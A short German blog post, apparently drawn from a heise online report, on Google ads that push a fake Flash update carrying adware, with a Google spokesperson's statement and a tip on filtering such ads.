Wer dieses Programm installiert, bekommt aber nicht das von Adobe empfohlene Flash-Update, sondern handelt sich einen Schädling ein. Dieser wird derzeit nur von wenigen Virenscannern erkannt. Dem österreichischen Unternehmen Ikarus zufolge handelt es sich um Adware, also Software, die unerwünschte Werbung einblendet
[Update]
Am heutigen Samstag Abend erklärte Lena Wagner, Sprecherin von Google Deutschland, gegenüber heise online: "Selbstverständlich erlauben unsere AdWords-Geschäftsbedingungen Werbetreibenden nicht, Webseiten, die Viren enthalten, zu bewerben. Wenn wir entdecken, dass solche Anzeigen erscheinen, entfernen wir diese."
Quelle: http://www.heise.de/security/Google-Werbung-wird-als-Malware-Schleuder-missbraucht-Update--/news/meldung/117564
Blockieren kann man solche Werbung eigentlich ganz einfach mit dem eingebautem AdSense Conten Filter hier ein Screenshot:
Unlocking Aladino Voip New
use this guide to unlock Telecom Italia's Aladino Voip new and use it with other SIP Operators
Labels: Security, Unlocking, Voip
Abonnieren
Posts (Atom)
